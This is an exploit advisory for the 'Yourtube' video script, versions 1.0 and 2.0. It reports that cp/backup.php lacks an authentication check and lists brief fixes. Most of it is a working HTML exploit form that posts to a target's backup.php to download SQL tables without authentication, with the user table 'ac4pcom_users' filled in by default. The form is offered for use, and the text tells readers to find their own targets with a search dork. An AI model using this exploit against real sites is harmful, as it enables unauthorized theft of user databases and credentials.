- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | Exploit Title : Yourtube Sql table download vuln | Auther : Eg-R1z | Home : black-hat.cc , sec4ever.com | contact : Get me @ the above sites > i-Hmx - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - | script name : Yourtube | version : 1.0 , 2.0 don't know abt v3 but it's maybe affected also | Dork : just find ur own one | Vulnerability : due to stupid confirmation rule on cp/backup.php file | Quick sollution:- | Coder rule : Applying strong login confirmation rule on backup.php file | User rule : firewall on the cp directory seem 2 B enough | > Update to newer version < v4 is preferred > - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Exploit Code <html> - - - - - - - - - - - - - - - - - - - - <html dir="rtl"> <head> <style type="text/css"> <!-- .style1 {color: #FF0000} .style2 { color: #0000FF; font-weight: bold; } --> </style> <title>YourTube Sql tables Download Exploit - HaCKeR-MaN</title><div> </TD></TR> </TABLE> </td> <td width="100%" height="327" align="center" valign="top"> <TABLE align="center" dir="ltr" WIDTH=97% BORDER=0 CELLPADDING=0 CELLSPACING=0 height="23"> <TR> <TD dir="rtl" bgcolor="#FFFFFF" align="center" valign="top" height="19" width="959"> <div align="center"> <form name="a" action="" method="post" name="formw" onsubmit="document.a.action = document.a.site.value+'/backup.php';document.a.submit"> </div> <p align="center"><strong>YourTube Sql tables Download Exploit</strong></p> <p align="center"><strong>Coded By <span class="style1">HaCKeR-MaN</span></strong></p> <p align="center"><strong>Black-hat.cc , sec4ever.com </strong></p> <p align="center" class="style2">Target Url </p> <p align="center"> <input name="action" type="hidden" value="yes"> <input name="site" type="text" value="http://target/path/cp" size="35" align="left"> </p> <p align="center" class="style2">Table name </p> <p align="center"> <input type="text" name="tablen[]" value="ac4pcom_users" size=35 /> </p> <p align="center"><br> <input type="submit" name="submit2" class="buttons" value="Get it" /> </form> </p></TD></TR> </td> </tr> </center> </div> </body> </html> - - - - - - - - - - - - - - - - - - End of the shit - - - - - - - - - - - - - - - - - - - -